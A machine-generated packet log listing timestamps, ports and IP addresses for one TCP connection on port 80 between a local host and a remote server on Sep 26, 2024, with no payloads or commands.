Sep 26, 2024 22:40:06.717711926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.717714071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.717746019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.717760086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.717824936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.717835903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.717845917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.717855930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.717869043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.717886925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.717900991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.717910051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.717914104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.717920065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.717930079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.717940092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.717945099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.717972994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.717988968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718004942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718015909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718025923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718034983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718045950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718048096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718079090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718102932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718108892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718118906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718128920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718139887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718156099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718168020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718197107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718225956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718235970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718245029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718255997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718266964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718271017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718276978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718301058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718305111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718317032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718318939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718348026 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718367100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718369007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718377113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718385935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718405008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718416929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718439102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718472004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718482018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718491077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718501091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718512058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718513012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718533993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718556881 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718564987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718575001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718607903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718648911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718660116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718669891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718684912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718691111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718719006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718740940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718821049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718831062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718839884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718849897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718863964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718871117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718874931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718887091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718892097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718899012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718924046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718934059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718945980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718955994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718966961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718983889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.718986034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.718997002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.719007015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.719013929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.719017982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.719039917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.719058990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.719060898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.719072104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.719082117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.719090939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.719104052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.719122887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.719146013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.755698919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.755800009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.755842924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.755876064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.755907059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.755929947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.755939007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.755964041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.755985975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.755995989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756023884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756031036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756052971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756095886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756102085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756136894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756165028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756164074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756186008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756197929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756216049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756231070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756233931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756248951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756249905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756268978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756274939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756295919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756298065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756298065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756319046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756320000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756336927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756354094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756355047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756370068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756375074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756386995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756403923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756422043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756422043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756422043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756434917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756447077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756450891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756467104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756481886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756481886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756498098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756513119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756519079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756529093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756541014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756545067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756557941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756561041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756577969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756593943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756596088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756611109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756625891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756639004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756639004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756643057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756659031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756680965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756752014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756766081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756783009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756798983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.756812096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756839037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.756860971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.770055056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.770088911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.770113945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.770138979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.770138979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.770164967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.770179987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.770194054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.770210028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.770226955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.770227909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.770245075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.770247936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.770261049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.770272017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.770277977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.770287991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.770329952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.770332098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.770349026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.770365000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.770380020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.770382881 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.770420074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.770438910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.820434093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.820450068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.820465088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.820552111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.820586920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.820777893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.820792913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.820808887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.820822954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.820838928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.820842028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.820866108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.820883036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.820928097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.821120977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.821182966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.821320057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.821335077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.821350098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.821363926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.821379900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.821393013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.821430922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.821432114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.821455002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.821470976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.821484089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.821499109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.821515083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.821518898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.821532011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.821538925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.821557999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.821573973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.821589947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.821604967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.821645021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.821675062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.821782112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.821798086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.821811914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.821826935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.821844101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.821849108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.821858883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.821875095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.821878910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.821913958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.821943045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.821969986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.821986914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.822001934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.822017908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.822024107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.822051048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.822051048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.822068930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.822187901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.822211027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.822252989 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.822300911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.822318077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.822333097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.822349072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.822364092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.822379112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.822380066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.822396994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.822412014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.822432995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.822463036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.822496891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.822511911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.822526932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.822551012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.822551966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.822571039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.822577000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.822587013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.822603941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.822607040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.822627068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.822644949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.822650909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.822662115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.822670937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.822707891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.822822094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.822837114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.822853088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.822897911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.822897911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.822961092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.822983980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.823000908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.823015928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.823045015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.823045015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.823075056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.823129892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.823147058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.823194027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.823194027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.823333979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.823348999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.823364019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.823379993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.823405027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.823415041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.823415041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.823420048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.823429108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.823436022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.823437929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.823465109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.823467970 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.823481083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.823497057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.823513031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.823517084 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.823517084 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.823529005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.823535919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.823570967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.823590994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.859493017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.859508991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.859543085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.859565973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.859582901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.859597921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.859613895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.859639883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.859641075 CEST	49730	80	192.168.2.4	185.215.113.37
